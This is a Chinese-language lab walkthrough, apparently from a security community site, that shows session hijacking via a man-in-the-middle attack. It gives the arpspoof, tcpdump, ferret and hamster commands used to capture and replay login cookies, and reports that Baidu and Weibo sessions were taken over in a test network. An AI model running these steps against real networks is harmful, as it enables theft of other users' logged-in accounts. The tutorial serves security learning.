关于中间人攻击
中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。
因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。
视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws
注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用
关于抓取cookies的手记
要echo下,实现流量的转发,要不目标是上不了网的。
arpspoof 进行arp欺骗
首先抓取包wireshark:选择本地网卡eth0,star抓取流量。
这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。
用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp
重写之后生产hamster.txt
这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了
user。qonze你懂得
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗
tcpdump抓去打到本地的数据包
Ferret用来处理抓下来的数据包的
Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
0×01
拓扑环境:
攻击机:Kali 192.168.1.120
受害机:Windows7 192.168.1.100
网关:192.168.1.1
0×02
我的几个社区帐号都是登录状态,当然未登录也是可以劫持的
先看下我在Kali的机器上是未登录的
0×03
开始arp欺骗
命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
捕获数据包
命令:tcpdump -i eth0 -w cookie.cap
0×05
模拟受害者登录
受害者在受害机器上就随便刷新一下或者登录一下
完毕
下面我们开始重点
0×06
处理抓去的数据包
ferret -r cookie.cap
自动生成了 hamster.txt
0×07
开启hamster服务
0×08
打开浏览器,使用代理
0×09
打开hamster 浏览器输入http://hamster
选择目标
0x0A
找敏感地址
0x0B
百度劫持成功
微博劫持成功
都成功了
0x0C
我在实验的时候碰见一个问题,就是突然上不到网
下面教大家解决
编辑/etc/NetworkManager/NetworkManager.conf
vi /etc/NetworkManager/NetworkManager.conf
改成true后保存
service network-manager restart
重启服务